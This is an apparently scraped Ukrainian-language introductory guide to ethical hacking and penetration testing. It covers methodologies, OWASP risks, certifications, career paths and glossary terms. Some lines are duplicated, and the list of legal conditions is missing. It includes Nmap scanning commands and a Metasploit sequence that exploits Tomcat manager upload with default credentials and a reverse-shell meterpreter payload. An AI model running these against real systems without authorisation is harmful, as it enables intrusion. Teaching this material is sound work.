White Box Testing
Тестер має повну інформацію про систему: вихідний код, архітектуру, облікові дані. Дозволяє знайти глибокі логічні вразливості та проблеми дизайну.
Комплексний посібник з кібербезпеки: методології пентестингу, збору інформації, сканування вразливостей, експлуатації та пост-експлуатації. Легальне тестування систем на міцність.
Етичний хакінг (Ethical Hacking) — це легальне тестування систем безпеки з дозволу власника. Мета — знайти вразливості раніше за зловмисників. Результатом є звіт з рекомендаціями щодо усунення знайдених проблем.
Тестер має повну інформацію про систему: вихідний код, архітектуру, облікові дані. Дозволяє знайти глибокі логічні вразливості та проблеми дизайну.
Тестер має такий самий доступ як зовнішній атакер. Імітує реальну атаку — збирає інформацію через OSINT, сканує порти, шукає публічні експлойти.
Комбінація підходів: частковий доступ (наприклад, обліковий запис користувача). Найпоширеніший сценарій — тестування з перспективи скомпрометованого акаунту.
Penetration Testing Execution Standard (PTES) — узгоджена методологія, що складається з 7 фаз від початкового збору інформації до фінального звіту.
Пасивний збір інформації без прямого контакту з ціллю: WHOIS, DNS enumeration, пошук у відкритих джерелах (OSINT), аналіз соціальних мереж співробітників. 90% успішних атак починаються з якісної розвідки.
Спроба використати знайдені вразливості для отримання доступу. Включає buffer overflow, SQL injection, credential stuffing, privilege escalation. Завжди з урахуванням правил зупинки (scope limitations).
Common Vulnerability Scoring System — стандарт оцінки серйозності вразливостей. Розрахуйте базовий бал на основі метрик експлуатації та впливу.
Професійний арсенал для тестування на проникнення. Кожен інструмент має свою спеціалізацію та область застосування.
# Nmap - сканування портів та сервісів
+# Базове сканування відкритих портів
+nmap -sS -O target.com
+
+# Агресивне сканування з визначенням версій
+nmap -A -T4 -p- target.com
+
+# Сканування вразливостей за допомогою скриптів
+nmap --script vuln target.com
+
+# UDP сканування
+nmap -sU -p 53,67,68,161 target.com
+
+# Збереження результатів
+nmap -oN scan_results.txt target.com
# Metasploit Framework
+# Пошук експлойтів
+msf6 > search type:exploit name:apache
+
+# Використання модуля
+msf6 > use exploit/multi/http/tomcat_mgr_upload
+msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.1.10
+msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
+msf6 exploit(multi/http/tomcat_mgr_upload) > set USERNAME admin
+msf6 exploit(multi/http/tomcat_mgr_upload) > set PASSWORD password
+
+# Вибір payload
+msf6 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
Стандартний список найкритичніших ризиків безпеки веб-додатків. Кожен пентестер має перевіряти ці категорії в першу чергу.
| № | Вразливість | Ризик | Приклад атаки | Mitigation |
|---|---|---|---|---|
| A01 | Broken Access Control | Критичний | IDOR, path traversal | RBAC, deny by default |
| A02 | Cryptographic Failures | Критичний | Weak encryption, plaintext | AES-256-GCM, TLS 1.3 |
| A03 | Injection | Критичний | SQLi, Command injection | Parameterized queries |
| A04 | Insecure Design | Високий | Business logic flaws | Threat modeling |
| A05 | Security Misconfiguration | Високий | Default creds, debug mode | Hardening, CIS benchmarks |
| A06 | Vulnerable Components | Високий | Outdated libraries | SBOM, dependency scanning |
Базові навички: Linux, networking, Python, Burp Suite. Сертифікати: eJPT, CompTIA Security+.
Досвід 2+ роки. Глибоке розуміння веб-та мережевих атак. OSCP — must have.
Методології, звіти для C-level, red teaming. OSEP, OSWE сертифікації.
Стратегія безпеки, zero-day research, конференції (DEF CON, Black Hat).
Так, але за умови:
Без цих умов будь-яке тестування є кримінальним правопорушенням (ККУ ст. 361-363).
Початковий рівень: CompTIA Security+, eJPT (eLearnSecurity), CEH.
Середній рівень: OSCP (Offensive Security Certified Professional) — золотий стандарт індустрії. 24-годинний практичний екзамен.
Просунутий: OSEP (Evasion), OSWE (Web), OSED (Exploit Development), CRTO (Cobalt Strike), GXPN.
Red Team — атакувальна сторона, імітує реальних зловмисників. Мета — показати реальні наслідки компрометації. Використовує TTPs (Tactics, Techniques, Procedures).
Blue Team — захисна сторона. Моніторинг, реагування на інциденти, hardening, створення правил детектування (SIEM, IDS).
Purple Team — співпраця Red та Blue для покращення захисту.
Програми, де компанії платять за знайдені вразливості в їхніх системах. Популярні платформи:
Суми винагород: від $100 за low severity до $50,000+ за critical (RCE).
Код або послідовність дій, що використовує вразливість для отримання неавторизованого доступу або виконання довільного коду.
Частина експлойта, що виконується після успішної компрометації. Наприклад, reverse shell, meterpreter session, ransomware.
Вразливість, невідома виробнику і ще не виправлена. Найнебезпечніший тип — немає патчів для захисту.
Інтерфейс командного рядка на скомпрометованій системі. Bind shell — пряме підключення, reverse shell — зворотне (обходить firewall).
Підвищення прав доступу в системі: від звичайного користувача до адміністратора (vertical) або до іншого користувача (horizontal).
Рух всередині скомпрометованої мережі від однієї системи до іншої з метою знаходження цінних активів (domain controller, databases).